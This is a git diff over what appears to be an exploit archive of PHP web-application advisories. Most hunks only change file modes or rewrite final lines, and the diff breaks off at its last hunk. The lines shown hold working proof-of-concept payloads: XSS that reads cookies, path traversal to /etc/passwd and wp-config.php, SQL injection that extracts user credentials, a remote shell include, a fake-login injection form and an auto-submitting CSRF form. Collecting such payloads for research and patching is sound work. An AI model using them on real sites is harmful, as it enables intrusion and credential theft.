file +http://www.example.com/kindeditor/index.php?name=<pre><script>alert('XSS');</script>by ZSL!</pre> \ No newline at end of file diff --git a/platforms/php/webapps/37653.txt b/platforms/php/webapps/37653.txt old mode 100755 new mode 100644 index b84471f17..560b86475 --- a/platforms/php/webapps/37653.txt +++ b/platforms/php/webapps/37653.txt @@ -4,4 +4,4 @@ The Rich WidgetPlugin for WordPress is prone to an arbitrary file-upload vulnera An attacker can exploit this issue to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. -http://www.example.com/wp-content/plugins/rich-widget/fckeditor/editor/filemanager/connectors/test.html \ No newline at end of file +http://www.example.com/wp-content/plugins/rich-widget/fckeditor/editor/filemanager/connectors/test.html \ No newline at end of file diff --git a/platforms/php/webapps/37654.txt b/platforms/php/webapps/37654.txt old mode 100755 new mode 100644 index 2e5ae6c5f..80dda21dd --- a/platforms/php/webapps/37654.txt +++ b/platforms/php/webapps/37654.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to upload arbitrary code and run it i http://www.example.com/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html -http://www.example.com/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html \ No newline at end of file +http://www.example.com/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html \ No newline at end of file diff --git a/platforms/php/webapps/37656.txt b/platforms/php/webapps/37656.txt old mode 100755 new mode 100644 index 1c0a13d35..50e6f68a3 --- a/platforms/php/webapps/37656.txt +++ b/platforms/php/webapps/37656.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to view files and execute local scrip Ad Manager Pro version 4.0 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd \ No newline at end of file +http://www.example.com/index.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd \ No newline at end of file diff --git a/platforms/php/webapps/37659.txt b/platforms/php/webapps/37659.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3766.txt b/platforms/php/webapps/3766.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37666.txt b/platforms/php/webapps/37666.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37672.txt b/platforms/php/webapps/37672.txt old mode 100755 new mode 100644 index 6e2b1e2c4..9a5dae38d --- a/platforms/php/webapps/37672.txt +++ b/platforms/php/webapps/37672.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow JW Player 5.10.2295 and prior versions are also vulnerable. -http://www.example.com/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B \ No newline at end of file +http://www.example.com/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B \ No newline at end of file diff --git a/platforms/php/webapps/37674.txt b/platforms/php/webapps/37674.txt old mode 100755 new mode 100644 index 9b9e37496..031f846c1 --- a/platforms/php/webapps/37674.txt +++ b/platforms/php/webapps/37674.txt @@ -4,4 +4,4 @@ PHP Web Scripts Text Exchange Pro is prone to a local file-include vulnerability An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks. -http://www.example.com/textexchangepro/index.php?page=../../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/textexchangepro/index.php?page=../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/37675.txt b/platforms/php/webapps/37675.txt old mode 100755 new mode 100644 index 4a15f3449..6d054a0b4 --- a/platforms/php/webapps/37675.txt +++ b/platforms/php/webapps/37675.txt @@ -4,4 +4,4 @@ The Komento component for Joomla is prone to an SQL-injection vulnerability beca Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -www.example.com/component/komento/?view=rss&format=feed&component=com_content&cid=[id][sql injection] \ No newline at end of file +www.example.com/component/komento/?view=rss&format=feed&component=com_content&cid=[id][sql injection] \ No newline at end of file diff --git a/platforms/php/webapps/37677.txt b/platforms/php/webapps/37677.txt old mode 100755 new mode 100644 index 9d4b63dc5..526de6f57 --- a/platforms/php/webapps/37677.txt +++ b/platforms/php/webapps/37677.txt @@ -4,4 +4,4 @@ The Finder plugin for WordPress is prone to a cross-site scripting vulnerability An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(0);%3C/script%3E \ No newline at end of file +http://www.example.com/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(0);%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37679.txt b/platforms/php/webapps/37679.txt old mode 100755 new mode 100644 index 609d60ddc..c5ff70b72 --- a/platforms/php/webapps/37679.txt +++ b/platforms/php/webapps/37679.txt @@ -10,4 +10,4 @@ http://www.example.com/cat.php?cid=%22%3E%3Cscript%3Ealert(0);%3C/script%3E http://www.example.com/cat.php?cid=%22%3E%3Cscript%3Ealert(0);%3C/script%3E -http://www.example.com/mobile.php?action=8&gid=&iid=145&search=%22%3E%3Cscript%3Ealert(0);%3C/script%3E \ No newline at end of file +http://www.example.com/mobile.php?action=8&gid=&iid=145&search=%22%3E%3Cscript%3Ealert(0);%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37680.txt b/platforms/php/webapps/37680.txt old mode 100755 new mode 100644 index 13b372a56..fe85e8f9a --- a/platforms/php/webapps/37680.txt +++ b/platforms/php/webapps/37680.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Mihalism Multi Host 5.0 is vulnerable; other versions may also be affected. -http://www.example.com/users.php?act=register&return=/><sCrIpT>alert('Explo!ter')</sCrIpT> \ No newline at end of file +http://www.example.com/users.php?act=register&return=/><sCrIpT>alert('Explo!ter')</sCrIpT> \ No newline at end of file diff --git a/platforms/php/webapps/37681.txt b/platforms/php/webapps/37681.txt old mode 100755 new mode 100644 index facd8174a..c8cb375cc --- a/platforms/php/webapps/37681.txt +++ b/platforms/php/webapps/37681.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to view local files in the context of http://www.example.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-config.php -http://www.example.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-login.php \ No newline at end of file +http://www.example.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-login.php \ No newline at end of file diff --git a/platforms/php/webapps/37682.txt b/platforms/php/webapps/37682.txt old mode 100755 new mode 100644 index ec7074b3b..204f02679 --- a/platforms/php/webapps/37682.txt +++ b/platforms/php/webapps/37682.txt @@ -4,4 +4,4 @@ The Simple:Press Forum plugin is prone to a vulnerability that lets attackers up An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. -http://www.example.com/wp/wp-content/plugins/simple-forum/forum/uploader/sf-uploader.php?id=4&folder=uploads/forum/petas \ No newline at end of file +http://www.example.com/wp/wp-content/plugins/simple-forum/forum/uploader/sf-uploader.php?id=4&folder=uploads/forum/petas \ No newline at end of file diff --git a/platforms/php/webapps/37683.txt b/platforms/php/webapps/37683.txt old mode 100755 new mode 100644 index 35886b634..efacb441c --- a/platforms/php/webapps/37683.txt +++ b/platforms/php/webapps/37683.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Phorum 5.2.18 is vulnerable; other versions may also be affected. -http://www.example.com/control.php?0,panel=groupmod,group=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file +http://www.example.com/control.php?0,panel=groupmod,group=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37684.html b/platforms/php/webapps/37684.html old mode 100755 new mode 100644 index ef1c42070..f1a7b20d4 --- a/platforms/php/webapps/37684.html +++ b/platforms/php/webapps/37684.html @@ -4,4 +4,4 @@ PrestaShop is prone to multiple cross-site scripting vulnerabilities because it An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. -<form action="http://[host]/[ADMIN_PANEL]/ajax.php" method="post"> <input type="hidden" name="ajaxProductsPositions" value='' /> <input type="hidden" name="id_product" value='1' /> <input type="hidden" name="id_category" value='1' /> <input type="hidden" name='product[<form action="/[ADMIN_PANEL]/login.php" method="post"><input type="text" id="email" name="email" value="" class="input"/><input id="passwd" type="password" name="passwd" class="input" value=""/></form><script>function hackfunc() { alert("Your Login: "+document.getElementById("email").value+"\nYour Password: "+document.getElementById("passwd").value); } setTimeout("hackfunc()", 1000);</script>]' value='1_1_1' /> <input type="submit" id="btn"> </form> \ No newline at end of file +<form action="http://[host]/[ADMIN_PANEL]/ajax.php" method="post"> <input type="hidden" name="ajaxProductsPositions" value='' /> <input type="hidden" name="id_product" value='1' /> <input type="hidden" name="id_category" value='1' /> <input type="hidden" name='product[<form action="/[ADMIN_PANEL]/login.php" method="post"><input type="text" id="email" name="email" value="" class="input"/><input id="passwd" type="password" name="passwd" class="input" value=""/></form><script>function hackfunc() { alert("Your Login: "+document.getElementById("email").value+"\nYour Password: "+document.getElementById("passwd").value); } setTimeout("hackfunc()", 1000);</script>]' value='1_1_1' /> <input type="submit" id="btn"> </form> \ No newline at end of file diff --git a/platforms/php/webapps/37687.txt b/platforms/php/webapps/37687.txt old mode 100755 new mode 100644 index 84ec0453d..31514cff3 --- a/platforms/php/webapps/37687.txt +++ b/platforms/php/webapps/37687.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow TomatoCart 1.1.7 is vulnerable; other versions may also be affected. -http://www.example.com/with/tomato/ext/secureimage/example_from.ajax.php/"></script><whatever.now> \ No newline at end of file +http://www.example.com/with/tomato/ext/secureimage/example_from.ajax.php/"></script><whatever.now> \ No newline at end of file diff --git a/platforms/php/webapps/37690.txt b/platforms/php/webapps/37690.txt old mode 100755 new mode 100644 index cfbff87ed..9c9b4f911 --- a/platforms/php/webapps/37690.txt +++ b/platforms/php/webapps/37690.txt @@ -4,4 +4,4 @@ Crowbar is prone to multiple cross-site scripting vulnerabilities because it fai An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/utils?waiting=true&file=foo'%3B})% 3B}alert(document.cookie)</script><!-- \ No newline at end of file +http://www.example.com/utils?waiting=true&file=foo'%3B})% 3B}alert(document.cookie)</script><!-- \ No newline at end of file diff --git a/platforms/php/webapps/37691.txt b/platforms/php/webapps/37691.txt old mode 100755 new mode 100644 index ba429083e..a0ccc90bb --- a/platforms/php/webapps/37691.txt +++ b/platforms/php/webapps/37691.txt @@ -12,4 +12,4 @@ http://www.example.com/sugarcrm/vcal_server.php?type=vfb&user_name=will http://www.example.com/sugarcrm/ical_server.php?type=ics&key=&email=will@example.com -http://www.example.com/sugarcrm/ical_server.php?type=ics&key=&user_name=will \ No newline at end of file +http://www.example.com/sugarcrm/ical_server.php?type=ics&key=&user_name=will \ No newline at end of file diff --git a/platforms/php/webapps/37693.txt b/platforms/php/webapps/37693.txt old mode 100755 new mode 100644 index 4eb82ebdf..72f248d68 --- a/platforms/php/webapps/37693.txt +++ b/platforms/php/webapps/37693.txt @@ -8,4 +8,4 @@ Sitemax Maestro 2.0 is vulnerable; other versions may also be affected. http://www.example.com/pages.php?al=100000000000000000000000000' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,user_password) from sed_users limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1 -http://www.example.com/swlang.php?lang=../../datas/users/file.gif%00&redirect= \ No newline at end of file +http://www.example.com/swlang.php?lang=../../datas/users/file.gif%00&redirect= \ No newline at end of file diff --git a/platforms/php/webapps/37694.txt b/platforms/php/webapps/37694.txt old mode 100755 new mode 100644 index d647ea311..ecaa15265 --- a/platforms/php/webapps/37694.txt +++ b/platforms/php/webapps/37694.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application and Wiki Web Help 0.3.11 is vulnerable; other versions may also be affected. -http://www.example.com/wwh/pages/links.php?configpath=http://www.example2.com/shell.txt? \ No newline at end of file +http://www.example.com/wwh/pages/links.php?configpath=http://www.example2.com/shell.txt? \ No newline at end of file diff --git a/platforms/php/webapps/37695.txt b/platforms/php/webapps/37695.txt old mode 100755 new mode 100644 index b670652df..37250faa4 --- a/platforms/php/webapps/37695.txt +++ b/platforms/php/webapps/37695.txt @@ -10,4 +10,4 @@ Post Data: dbuser_user_email=admin%40domain.com%27+and+99%3D99--+and+0%3D%270&dbuser_user_password=WILL_BYPASS_IT_LIKE_2X2&login=Login Example URL: -http://www.example.com/index.php?module=user&content=execute&execute=user_account_activation&user_email=pipi@pipi.com%27%20or%20sleep%2810%29--%20and%205=%275&activation_key=TS0nz4hLVgZ83mrvgtPS \ No newline at end of file +http://www.example.com/index.php?module=user&content=execute&execute=user_account_activation&user_email=pipi@pipi.com%27%20or%20sleep%2810%29--%20and%205=%275&activation_key=TS0nz4hLVgZ83mrvgtPS \ No newline at end of file diff --git a/platforms/php/webapps/37697.txt b/platforms/php/webapps/37697.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37698.txt b/platforms/php/webapps/37698.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37705.txt b/platforms/php/webapps/37705.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37707.txt b/platforms/php/webapps/37707.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37708.txt b/platforms/php/webapps/37708.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37709.txt b/platforms/php/webapps/37709.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3771.txt b/platforms/php/webapps/3771.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37712.txt b/platforms/php/webapps/37712.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37713.txt b/platforms/php/webapps/37713.txt old mode 100755 new mode 100644 index af576a336..5f4b2ff04 --- a/platforms/php/webapps/37713.txt +++ b/platforms/php/webapps/37713.txt @@ -72,4 +72,4 @@ http://localhost/2Moons-master.zip ** Remove the externalAuthMethod Permanently ** ** No solution yet from vendor ** //\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\ -//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\ \ No newline at end of file +//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\ \ No newline at end of file diff --git a/platforms/php/webapps/37714.txt b/platforms/php/webapps/37714.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37715.txt b/platforms/php/webapps/37715.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37725.txt b/platforms/php/webapps/37725.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37726.txt b/platforms/php/webapps/37726.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3773.txt b/platforms/php/webapps/3773.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37734.html b/platforms/php/webapps/37734.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37735.txt b/platforms/php/webapps/37735.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37738.txt b/platforms/php/webapps/37738.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3774.txt b/platforms/php/webapps/3774.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37744.txt b/platforms/php/webapps/37744.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3775.txt b/platforms/php/webapps/3775.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37750.txt b/platforms/php/webapps/37750.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37751.txt b/platforms/php/webapps/37751.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37752.txt b/platforms/php/webapps/37752.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37753.txt b/platforms/php/webapps/37753.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37754.txt b/platforms/php/webapps/37754.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37769.txt b/platforms/php/webapps/37769.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37773.txt b/platforms/php/webapps/37773.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37774.txt b/platforms/php/webapps/37774.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37779.txt b/platforms/php/webapps/37779.txt old mode 100755 new mode 100644 index 512195cf4..1d7893e0a --- a/platforms/php/webapps/37779.txt +++ b/platforms/php/webapps/37779.txt @@ -8,4 +8,4 @@ Flogr 2.5.6 is vulnerable; prior versions may also be affected. http://www.example.com/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E/ -http://www.example.com/index.php?[any]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file +http://www.example.com/index.php?[any]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/3778.txt b/platforms/php/webapps/3778.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37781.txt b/platforms/php/webapps/37781.txt old mode 100755 new mode 100644 index 511b1d6b7..ba22cb033 --- a/platforms/php/webapps/37781.txt +++ b/platforms/php/webapps/37781.txt @@ -8,4 +8,4 @@ ExtCalendar 2.0 is vulnerable; other versions may also be affected. http://www.example.com/calendar.php?mode=view&id={SQL} http://www.example.com/calendar.php?mode=cat&cat_id={SQL} -http://www.example.com/calendar/cal_popup.php?mode=view&id={SQL} \ No newline at end of file +http://www.example.com/calendar/cal_popup.php?mode=view&id={SQL} \ No newline at end of file diff --git a/platforms/php/webapps/37782.txt b/platforms/php/webapps/37782.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37784.txt b/platforms/php/webapps/37784.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37785.txt b/platforms/php/webapps/37785.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37786.txt b/platforms/php/webapps/37786.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37787.txt b/platforms/php/webapps/37787.txt old mode 100755 new mode 100644 index 03c7a9c4d..475470289 --- a/platforms/php/webapps/37787.txt +++ b/platforms/php/webapps/37787.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Download Monitor 3.3.5.7 is vulnerable; other versions may also be affected. -GET /wp/?dlsearch=">alert('xsstest') HTTP/1.1 \ No newline at end of file +GET /wp/?dlsearch=">alert('xsstest') HTTP/1.1 \ No newline at end of file diff --git a/platforms/php/webapps/37789.txt b/platforms/php/webapps/37789.txt old mode 100755 new mode 100644 index 788624daf..aa6b67907 --- a/platforms/php/webapps/37789.txt +++ b/platforms/php/webapps/37789.txt @@ -12,4 +12,4 @@ https://www.example.com/admin/volumes_iscsi_targets.html?targetName="><script>al https://www.example.com/phpinfo.html -https://www.example.com/uptime.html \ No newline at end of file +https://www.example.com/uptime.html \ No newline at end of file diff --git a/platforms/php/webapps/37790.txt b/platforms/php/webapps/37790.txt old mode 100755 new mode 100644 index 89b03db86..e845c7e43 --- a/platforms/php/webapps/37790.txt +++ b/platforms/php/webapps/37790.txt @@ -10,4 +10,4 @@ http://www.example.com/warstats/playerdetails.php?id=13' http://www.example.com/playerdetails.php?id=9' -http://www.example.com/il2-stats/playerdetails.php?id=29' \ No newline at end of file +http://www.example.com/il2-stats/playerdetails.php?id=29' \ No newline at end of file diff --git a/platforms/php/webapps/37804.txt b/platforms/php/webapps/37804.txt old mode 100755 new mode 100644 index 30df46a6b..904d92e9d --- a/platforms/php/webapps/37804.txt +++ b/platforms/php/webapps/37804.txt @@ -10,4 +10,4 @@ htp://www.example.com/index.php?c=[XSS] htp://www.example.com/PAth/index.php?s=[XSS] htp://www.example.com/PAth/index.php?s=y&id=[XSS] htp://www.example.com/PAth/index.php?m=[XSS] -htp://www.example.com/PAth/index.php?d=[XSS] \ No newline at end of file +htp://www.example.com/PAth/index.php?d=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/37805.txt b/platforms/php/webapps/37805.txt old mode 100755 new mode 100644 index 1f559f78f..90279f681 --- a/platforms/php/webapps/37805.txt +++ b/platforms/php/webapps/37805.txt @@ -8,4 +8,4 @@ http://www.example.com/gallery.php?cid=124'&pid=124 http://www.example.com/gallery.php?cat_id=17&cid='&pid=&img=1 -http://www.example.com/gallery.php?cid=124'&pid=124 \ No newline at end of file +http://www.example.com/gallery.php?cid=124'&pid=124 \ No newline at end of file diff --git a/platforms/php/webapps/37807.txt b/platforms/php/webapps/37807.txt old mode 100755 new mode 100644 index dc07dcd9d..f055861eb --- a/platforms/php/webapps/37807.txt +++ b/platforms/php/webapps/37807.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access VBulletin 4.1.12 is vulnerable; other versions may also be affected. -http://www.example.com/includes/blog_plugin_useradmin.php?do=usercss&amp;u=[Sql] \ No newline at end of file +http://www.example.com/includes/blog_plugin_useradmin.php?do=usercss&amp;u=[Sql] \ No newline at end of file diff --git a/platforms/php/webapps/37809.php b/platforms/php/webapps/37809.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3781.txt b/platforms/php/webapps/3781.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37815.txt b/platforms/php/webapps/37815.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37817.txt b/platforms/php/webapps/37817.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37818.txt b/platforms/php/webapps/37818.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37819.txt b/platforms/php/webapps/37819.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37820.txt b/platforms/php/webapps/37820.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37821.txt b/platforms/php/webapps/37821.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37822.txt b/platforms/php/webapps/37822.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37824.txt b/platforms/php/webapps/37824.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37826.txt b/platforms/php/webapps/37826.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37827.txt b/platforms/php/webapps/37827.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37828.txt b/platforms/php/webapps/37828.txt old mode 100755 new mode 100644 index d12005f5b..bb7215a88 --- a/platforms/php/webapps/37828.txt +++ b/platforms/php/webapps/37828.txt @@ -4,4 +4,4 @@ Poweradmin is prone to a cross-site scripting vulnerability because it fails to An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/index.php/%3E%22%3E%3CScRiPt%3Ealert%28415833140173%29%3C/ScRiPt%3E \ No newline at end of file +http://www.example.com/index.php/%3E%22%3E%3CScRiPt%3Ealert%28415833140173%29%3C/ScRiPt%3E \ No newline at end of file diff --git a/platforms/php/webapps/37829.txt b/platforms/php/webapps/37829.txt old mode 100755 new mode 100644 index 6d2896837..ddad09717 --- a/platforms/php/webapps/37829.txt +++ b/platforms/php/webapps/37829.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow MF Gig Calendar 0.9.4.1 is vulnerable; other versions may also be affected. -GET /wp/?page_id=2&"><script>alert('xsstest')</script> HTTP/1.1 \ No newline at end of file +GET /wp/?page_id=2&"><script>alert('xsstest')</script> HTTP/1.1 \ No newline at end of file diff --git a/platforms/php/webapps/3783.txt b/platforms/php/webapps/3783.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37833.txt b/platforms/php/webapps/37833.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37835.html b/platforms/php/webapps/37835.html old mode 100755 new mode 100644 index 491e7bd3f..d98c316ab --- a/platforms/php/webapps/37835.html +++ b/platforms/php/webapps/37835.html @@ -6,4 +6,4 @@ Exploiting this issue may allow a remote attacker to perform certain actions in WordPress 3.4.2 is vulnerable; other versions may also be affected. -<body onload="javascript:document.forms[0].submit()"> <form action="http://TARGET_GOES_HERE/wp-admin/?edit=dashboard_incoming_links#dashboard_incoming_links" method="post" class="dashboard-widget-control-form"> <h1>How Many Girls You Have? xD))</h1> <!-- Idea for you: Iframe it --> <input name="widget-rss[1][url]" type="hidden" value="http://THINK_YOUR_SELF_HOW_YOU_CAN_USE_IT/test.php" /> <select id="rss-items-1" name="widget-rss[1][items]"> <option value='1' >1</option> <option value='2' >2</option> <option value='3' >3</option><option value='4' >4</option> <option value='5' >5</option> <option value='6' >6</option> <option value='7' >7</option> <option value='8' >8</option> <option value='9' >9</option> <option value='10' >10</option> <option value='11' >11</option> <option value='12' >12</option> <option value='13' >13</option> <option value='14' >14</option> <option value='15' >15</option> <option value='16' >16</option> <option value='17' >17</option> <option value='18' >18</option> <option value='19' >19</option> <option value='20' selected='selected'>20</option> </select> <input id="rss-show-date-1" name="widget-rss[1][show_date]" type="checkbox" value="1" checked="checked"/> <input type="hidden" name="widget_id" value="dashboard_incoming_links" /> </form> \ No newline at end of file +<body onload="javascript:document.forms[0].submit()"> <form action="http://TARGET_GOES_HERE/wp-admin/?edit=dashboard_incoming_links#dashboard_incoming_links" method="post" class="dashboard-widget-control-form"> <h1>How Many Girls You Have? xD))</h1> <!-- Idea for you: Iframe it --> <input name="widget-rss[1][url]" type="hidden" value="http://THINK_YOUR_SELF_HOW_YOU_CAN_USE_IT/test.php" /> <select id="rss-items-1" name="widget-rss[1][items]"> <option value='1' >1</option> <option value='2' >2</option> <option value='3' >3</option><option value='4' >4</option> <option value='5' >5</option> <option value='6' >6</option> <option value='7' >7</option> <option value='8' >8</option> <option value='9' >9</option> <option value='10' >10</option> <option value='11' >11</option> <option value='12' >12</option> <option value='13' >13</option> <option value='14' >14</option> <option value='15' >15</option> <option value='16' >16</option> <option value='17' >17</option> <option value='18' >18</option> <option value='19' >19</option> <option value='20' selected='selected'>20</option> </select> <input id="rss-show-date-1" name="widget-rss[1][show_date]" type="checkbox" value="1" checked="checked"/> <input type="hidden" name="widget_id" value="dashboard_incoming_links" /> </form> \ No newline at end of file diff --git a/platforms/php/webapps/37836.txt b/platforms/php/webapps/37836.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37837.html b/platforms/php/webapps/37837.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37838.txt b/platforms/php/webapps/37838.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3785.txt b/platforms/php/webapps/3785.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3786.txt b/platforms/php/webapps/3786.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37885.html b/platforms/php/webapps/37885.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37886.txt b/platforms/php/webapps/37886.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37887.txt b/platforms/php/webapps/37887.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37888.txt b/platforms/php/webapps/37888.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37894.html b/platforms/php/webapps/37894.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37896.txt b/platforms/php/webapps/37896.txt old mode 100755 new mode 100644 index 8554eab26..ae9592d51 --- a/platforms/php/webapps/37896.txt +++ b/platforms/php/webapps/37896.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow ABC Test 0.1 is vulnerable; other versions may also be affected. -http://www.example.com/blog/wp-admin/admin.php?page=abctest&do=edit&id=%22%3E%3Ch1 %3EXSS%3C/h1 \ No newline at end of file +http://www.example.com/blog/wp-admin/admin.php?page=abctest&do=edit&id=%22%3E%3Ch1 %3EXSS%3C/h1 \ No newline at end of file diff --git a/platforms/php/webapps/37899.txt b/platforms/php/webapps/37899.txt old mode 100755 new mode 100644 index aacbbb656..632f39c1d --- a/platforms/php/webapps/37899.txt +++ b/platforms/php/webapps/37899.txt @@ -22,4 +22,4 @@ Review: Setup -> Incoming Calls -> Caller DID routes -> Create Single DID Route PoC:<iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe> Review: Setup -> Incoming Calls -> Caller ID Rules -> Create Call transfer Call [Note] -PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe> \ No newline at end of file +PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe> \ No newline at end of file diff --git a/platforms/php/webapps/37901.txt b/platforms/php/webapps/37901.txt old mode 100755 new mode 100644 index 10b312895..878d344ab --- a/platforms/php/webapps/37901.txt +++ b/platforms/php/webapps/37901.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc AlamFifa CMS 1.0 Beta is vulnerable; other versions may also be affected. 